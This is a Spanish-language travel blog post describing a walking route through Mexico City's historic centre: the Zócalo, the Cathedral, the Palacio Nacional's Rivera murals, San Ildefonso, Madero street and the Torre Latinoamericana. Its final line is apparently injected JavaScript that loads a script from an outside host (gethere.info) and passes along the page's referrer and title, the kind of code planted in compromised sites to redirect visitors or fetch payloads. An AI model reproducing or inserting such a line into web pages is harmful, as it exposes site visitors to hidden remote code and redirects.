Paseo por México DF

01/10/2015

México DF a vista de pájaro

México DF es una de las ciudades más grandes del mundo. Es una urbe extensa de unos nueve millones de habitantes (según la ONU, en toda la conurbación del Distrito Federal se concentran 20.4 millones). La ciudad está dividida en dieciséis delegaciones y muchas colonias, algunas famosas y otras no tanto. Por eso cuando se visita México DF uno lo hace con la sensación de estar en una ciudad inagotable, que apenas se puede abarcar. Pero calma; siendo ordenados, conseguiremos conocer algo mejor la personalidad de México DF. Vamos por el principio, vamos por el centro histórico de México DF.

El centro histórico coincide con lo que un día fue el centro político y ceremonial de la antigua Tenochtitlán, fundada por los mexicas en el centro del Valle de México. Sobre la que fuera la ciudad prehispánica se concentran más de siete siglos de historia en diferentes vestigios y monumentos históricos. Su importancia cultural es tal que la Unesco lo consideró Patrimonio de la Humanidad en 1987. Un recorrido imprescindible por el centro histórico de México DF engloba el Zócalo, la Catedral, el Palacio Nacional, el Colegio de San Idelfonso, la avenida peatonal de Francisco Madero, el Palacio de Bellas Artes y el Parque de la Alameda.

Comencemos nuestro paseo por el Zócalo, o Plaza de la Constitución (aunque no la busquéis por este nombre porque se la conoce mejor como zócalo). Detrás de Plaza Roja de Moscú y de Tiananmén en Pekín, se trata de la tercera plaza más grande del mundo. En frente veremos la Catedral Metropolitana de la Ciudad de México, que mandara construir Hernán Cortés sobre un antiguo templo de Tenochtitlán. Podemos subir a la cubierta para ver una vista sobre el enorme zócalo y entrar en las torres para conocer la historia de las diferentes campanas de la catedral que han estado presentes en los momentos históricos más importantes del país. A pocos pasos de la catedral encontraremos el Palacio Nacional, importante edificio que alberga el Poder Ejecutivo mexicano y el Ayuntamiento de la Ciudad de México, donde podemos ver algunos de los murales más espectaculares del artista Diego Rivera. Se trata de cinco murales en la segunda planta y en la escalera principal que hacen un repaso a toda la historia de México. Si queremos conocer más sobre el muralismo mexicano, seguiremos nuestro paseo hasta llegar al Colegio de San Idelfonso, cuna del arte de los murales, donde se conservan obras primerizas de Diego Rivera, y también de David Alfaro Siqueiros y José Clemente Orozco (juntos forman el grupo de tres muralistas más famosos de México).

Palacio Nacional

Un imprescindible en todo paseo por el Centro Histórico de México DF es caminar por la avenida peatonal de Francisco I. Madero, la concurrida y comercial calle es todo un espectáculo. En ella encontrarás estatuas humanas, la mayor variedad de artistas y vendedores callejeros y tiendas diferentes con las que divertirte. Subiendo por esta misma calle, llegamos a la Torre Latinoamericana, un gigante que, gracias a la tecnología con la que fue construido, ha vencido todos los terremotos de México. Desde el piso más alto, tendremos una de las vistas más espectaculares de la ciudad, como el Palacio de Bellas Artes o el Parque de la Alameda, donde, una vez que hayamos bajado, podemos acabar nuestro recorrido por los imprescindibles del Centro Histórico de México DF.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;